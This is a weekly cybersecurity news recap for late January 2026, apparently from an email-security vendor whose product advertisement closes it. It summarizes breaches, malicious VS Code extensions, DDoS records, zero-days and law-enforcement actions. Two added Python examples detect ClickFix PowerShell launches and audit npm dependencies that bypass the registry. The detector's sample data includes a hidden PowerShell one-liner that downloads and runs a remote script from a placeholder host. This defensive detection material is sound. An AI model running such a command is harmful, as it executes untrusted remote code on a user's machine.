WEEKLY CYBERSECURITY RECAP: January 26-30, 2026
This week's top cybersecurity news: Match Group breach exposes dating app users, malicious VS Code AI extensions steal code, FBI seizes RAMP forum, record-breaking DDoS attack, and more.
Your essential roundup of the week's most significant cybersecurity developments.
This week brought major data breaches affecting hundreds of millions of users, a record-shattering DDoS attack, law enforcement victories against cybercrime forums, and growing concerns about malicious AI tools infiltrating developer environments.
Major data breaches
Match Group breach exposes dating app users
A significant breach at Match Group has exposed user data from multiple popular dating platforms including Hinge, Tinder, OKCupid, and Match.com. The full scope of compromised data is still being assessed, but the incident highlights the sensitive nature of dating app information and the cascading impact when a parent company is breached.
SoundCloud breach impacts 298 million accounts
Have I Been Pwned has added the SoundCloud data breach to its database, confirming that 298 million accounts were compromised. Users of the audio streaming platform should assume their account information has been exposed and take appropriate protective measures.
Nike hit by Worldleaks extortion group
The extortion group Worldleaks claims to have stolen 1.4 terabytes of data from Nike. Dark Reading reports the group is threatening to release the data unless their demands are met, adding another major brand to the growing list of corporate extortion victims.
France fines unemployment agency €5 million
French authorities have fined the national unemployment agency €5 million following a data breach that exposed citizen information. The penalty underscores the regulatory consequences organizations face when failing to adequately protect personal data.
Malware and ransomware developments
Malicious VS Code AI extensions compromise 1.5 million developers
In one of the week's most alarming discoveries, security researchers identified malicious AI coding assistant extensions on the Visual Studio Code marketplace that had accumulated over 1.5 million installations. The extensions were designed to steal developer source code, potentially exposing proprietary codebases and sensitive intellectual property across thousands of organizations.
Fake MoltBot AI assistant raises alarms
A fraudulent AI coding assistant called "MoltBot" has been distributed through the VS Code marketplace, raising concerns about the security of AI development tools. The incident highlights the growing trend of attackers exploiting trust in AI assistants to distribute malware.
Aisuru Botnet sets DDoS record at 3.14 Tbps
The Aisuru botnet has achieved a new record for distributed denial-of-service attacks, generating an unprecedented 3.14 terabits per second of malicious traffic. This milestone demonstrates the escalating scale of DDoS capabilities and the threat they pose to online infrastructure.
Hugging Face abused for Android malware distribution
Attackers have weaponized the popular AI model repository Hugging Face to distribute thousands of Android malware variants. The abuse of trusted AI platforms for malware delivery represents an emerging threat vector that organizations must monitor.
Phantom malware hides in Android game mods
A new malware strain dubbed "Phantom" has been discovered hiding within Android game modifications, conducting ad fraud operations at scale. Users downloading unofficial game mods are particularly at risk.
Sicarii ransomware decrypted
Security researchers have successfully decrypted the "vibe-coded" Sicarii ransomware, offering potential relief to victims. The ransomware had employed unconventional coding techniques that initially complicated analysis.
Phishing and social engineering
Tax season phishing campaigns intensify
As tax season approaches globally, phishing campaigns are ramping up:
- Indian users are being targeted with tax-themed phishing emails delivering Blackmoon malware
- Fake Microsoft Teams billing alerts are being used to harvest corporate credentials
- Fraudulent ChatGPT browser extensions are hijacking user accounts
ClickFix attacks expand with new techniques
ClickFix attacks have evolved to abuse Windows App-V scripts for malware delivery. The technique uses fake error messages to trick users into executing malicious PowerShell commands themselves, bypassing traditional security controls.
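The detection angle on the technique above: a ClickFix victim pastes the command into the Run box or a fake "fix" dialog, so the shell is spawned by explorer.exe with arguments typical of a pasted one-liner. This added example (not from the original article or any vendor) scores constructed Sysmon-style process-creation events; field names and sample values are assumptions.

```python
"""Flag ClickFix-style launches: explorer.exe spawning a shell with
pasted-one-liner indicators. Added example; events are constructed, not real telemetry."""
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str   # parent image path (assumed Sysmon-like field)
    image: str    # launched image path
    cmdline: str  # full command line


SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
LAUNCHER_PARENTS = {"explorer.exe"}   # Run box / fake dialog launches come from here
# Indicators typical of pasted one-liners: hidden window, encoded payload,
# download-and-execute cmdlets, a remote URL, or an execution-policy bypass.
SUSPICIOUS = [
    re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),
    re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    re.compile(r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", re.I),
    re.compile(r"https?://", re.I),
    re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
]


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score(ev: ProcEvent) -> list[str]:
    """Return the matched indicator patterns; empty means nothing to flag."""
    if _basename(ev.image) not in SHELLS or _basename(ev.parent) not in LAUNCHER_PARENTS:
        return []
    return [p.pattern for p in SUSPICIOUS if p.search(ev.cmdline)]


def is_clickfix_like(ev: ProcEvent) -> bool:
    """Require two independent indicators to keep interactive admin use from alerting."""
    return len(score(ev)) >= 2


# Constructed sample events: a user opening a plain prompt, a ClickFix-style paste,
# a scheduled admin script (wrong parent), and a hidden-window launch with one indicator.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iex (irm https://example.invalid/fix.ps1)"'),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -ep bypass -File C:\scripts\backup.ps1"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -w hidden -File C:\tools\cleanup.ps1"),
]
```

Feeding real Sysmon Event ID 1 records into `ProcEvent` is the only adaptation needed; tune `LAUNCHER_PARENTS` and the threshold to your environment's baseline.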
Chrome Web Store infiltrated by malware service
A new malware-as-a-service operation now guarantees placement of phishing extensions on the Chrome Web Store, according to BleepingComputer. The service highlights the ongoing challenge of securing browser extension marketplaces.
Stanley toolkit enables undetectable Chrome phishing
Dark Reading reports on a new toolkit called "Stanley" that creates undetectable phishing attacks through Chrome, making it increasingly difficult for users to identify malicious sites.
Critical vulnerabilities
Ivanti EPMM zero-days under active exploitation
Two critical zero-day vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM) are being actively exploited for remote code execution. Organizations using Ivanti products should apply patches immediately.
SolarWinds Web Help Desk flaws disclosed
SolarWinds has issued warnings about critical RCE and authentication bypass vulnerabilities in Web Help Desk. Given SolarWinds' history as a target, these flaws demand urgent attention.
WinRAR vulnerability still being exploited
Despite patches being available for months, the WinRAR path traversal vulnerability continues to be exploited by numerous threat actors. Small and medium businesses appear to be hit hardest by ongoing attacks.
Fortinet discloses new zero-day
Fortinet has revealed a new zero-day vulnerability enabling malicious SSO logins. The company is urging customers to apply mitigations immediately.
Nearly 800,000 Telnet servers exposed
Researchers have identified nearly 800,000 Telnet servers exposed to remote attacks, representing a massive forgotten attack surface that threat actors can exploit.
Nation-state activity
Chinese APTs deploy high-end malware across Asia
Chinese advanced persistent threat groups are targeting Asian organizations with sophisticated, high-end malware designed for long-term espionage operations.
PeckBirdy campaign linked to China
A cross-platform attack campaign dubbed "PeckBirdy" has been attributed to China-backed threat actors, targeting multiple operating systems simultaneously.
Mustang Panda updates arsenal
The Mustang Panda APT group has deployed updated malware variants, continuing its campaigns against government and diplomatic targets.
Konni hackers leverage AI-generated content
The Konni threat group is now using AI-generated content to enhance its social engineering campaigns, marking another example of threat actors adopting generative AI.
Russian Electrum group linked to December attacks
New analysis ties the Russian threat actor "Electrum" to cyberattacks in December 2025, expanding understanding of their operational timeline.
Poland thwarts Russian wiper attack on power plants
Polish authorities have successfully defended against a Russian wiper malware attack targeting approximately 30 power facilities, preventing potentially significant infrastructure damage.
Law enforcement actions
FBI seizes RAMP cybercrime forum
The FBI has seized the RAMP cybercrime forum, a Russian-language marketplace used by ransomware gangs to recruit affiliates and trade access. The takedown disrupts a key node in the ransomware ecosystem.
Kingdown market operator pleads guilty
A Slovakian man has pleaded guilty to operating the Kingdown cybercrime marketplace, which facilitated the sale of stolen credentials and malware.
31 suspects charged in ATM jackpotting scheme
U.S. authorities have charged 31 additional suspects in connection with ATM malware attacks, expanding one of the largest prosecutions of jackpotting operations.
Platform and infrastructure security
WhatsApp introduces lockdown feature
WhatsApp has rolled out a new "lockdown" security feature designed to block cyberattacks and protect user accounts from compromise.
Microsoft Teams adds suspicious call reporting
A new Microsoft Teams feature will allow users to report suspicious calls, helping organizations identify and respond to voice-based social engineering attempts.
Google disrupts IPIDEA proxy network
Google has disrupted the IPIDEA residential proxy network, which was being fueled by malware-infected devices and used to mask malicious traffic.
npm security defenses bypassable
Security researchers have discovered that npm's "Shai-Hulud" security defenses can be bypassed via Git dependencies, potentially allowing malicious packages to evade detection.
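Because registry-side defenses only see packages that resolve through the npm registry, a Git or tarball dependency sidesteps them entirely. This added example (not from the research cited above, nor npm's own tooling) audits a constructed package.json and lockfile for specifiers that bypass the registry; the sample values and the registry host list are assumptions.

```python
"""Find dependency specifiers that resolve outside the npm registry (git URLs,
GitHub shorthand, remote tarballs, local paths). Added example; inputs are constructed."""
from __future__ import annotations
import json
import re

# Specifier forms npm accepts that never touch the registry.
GIT_PREFIXES = ("git+ssh://", "git+https://", "git+http://", "git://",
                "github:", "gitlab:", "bitbucket:", "gist:")
SHORTHAND = re.compile(r"^[\w.-]+/[\w.-]+(?:#.*)?$")          # owner/repo[#ref]
TARBALL = re.compile(r"^https?://.*\.(?:tgz|tar\.gz)$", re.I)
REGISTRY_HOSTS = ("https://registry.npmjs.org/",)            # extend for private mirrors


def classify(spec: str) -> str | None:
    """Return why `spec` bypasses the registry, or None for a normal version range."""
    if spec.startswith(GIT_PREFIXES):
        return "git-url"
    if SHORTHAND.match(spec):
        return "github-shorthand"
    if TARBALL.match(spec):
        return "remote-tarball"
    if spec.startswith(("file:", "link:")):
        return "local-path"
    return None


def audit_manifest(manifest: dict) -> dict[str, str]:
    """Map dependency name -> reason for every non-registry specifier in package.json."""
    findings: dict[str, str] = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in manifest.get(section, {}).items():
            if (reason := classify(spec)) is not None:
                findings[name] = reason
    return findings


def audit_lockfile(lock: dict) -> dict[str, str]:
    """Map installed path -> 'resolved' URL for lockfile v2/v3 entries not served by the registry."""
    return {path: meta["resolved"] for path, meta in lock.get("packages", {}).items()
            if path and meta.get("resolved") and not meta["resolved"].startswith(REGISTRY_HOSTS)}


# Constructed inputs: two registry packages plus four specifiers that bypass it.
SAMPLE_MANIFEST = json.loads("""{
  "dependencies": {"express": "^4.19.2", "left-pad": "github:someuser/left-pad#main",
                   "helper-lib": "someuser/helper-lib",
                   "vendored": "git+https://git.example.invalid/vendored.git#abcdef",
                   "blob": "https://cdn.example.invalid/blob-1.0.0.tgz"},
  "devDependencies": {"jest": "29.7.0", "local-tool": "file:../local-tool"}}""")
SAMPLE_LOCK = json.loads("""{"lockfileVersion": 3, "packages": {"": {"name": "demo"},
  "node_modules/express": {"resolved": "https://registry.npmjs.org/express/-/express-4.19.2.tgz"},
  "node_modules/left-pad": {"resolved": "git+ssh://git@github.com/someuser/left-pad.git#0123abc"}}}""")
```

Run both audits in CI and fail the build on any finding your allow-list does not cover; the lockfile check also catches Git resolution introduced transitively, which the manifest alone would miss.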
Key takeaways this week
- AI development tools are under attack: Multiple incidents involving malicious VS Code extensions and fake AI assistants demonstrate that developer environments are high-value targets.
- Tax season phishing is global: From India to the U.S., threat actors are exploiting tax anxiety with localized phishing campaigns.
- Record-breaking attacks continue: The 3.14 Tbps DDoS attack shows threat actors are scaling their capabilities faster than many defenses can adapt.
- Legacy vulnerabilities persist: The ongoing exploitation of the WinRAR flaw months after patching highlights the challenge of vulnerability management.
- Law enforcement is making progress: The RAMP forum seizure and multiple arrests show that coordinated action against cybercrime infrastructure can succeed.
Sources
This weekly recap aggregates reporting from leading cybersecurity news sources:
We acknowledge and thank these publications for their essential cybersecurity journalism.
Protect your organization
Email remains the primary attack vector for phishing, malware delivery, and business email compromise. As this week's news demonstrates, threats are evolving rapidly across every sector.
Stay protected with SO Email Security. Our AI-powered email protection detects and blocks phishing attempts, malicious attachments, and impersonation attacks before they reach your inbox.
Learn more at soemailsecurity.com
This recap is provided for educational purposes by SO Email Security. For the latest threat intelligence and protection, subscribe to our weekly newsletter.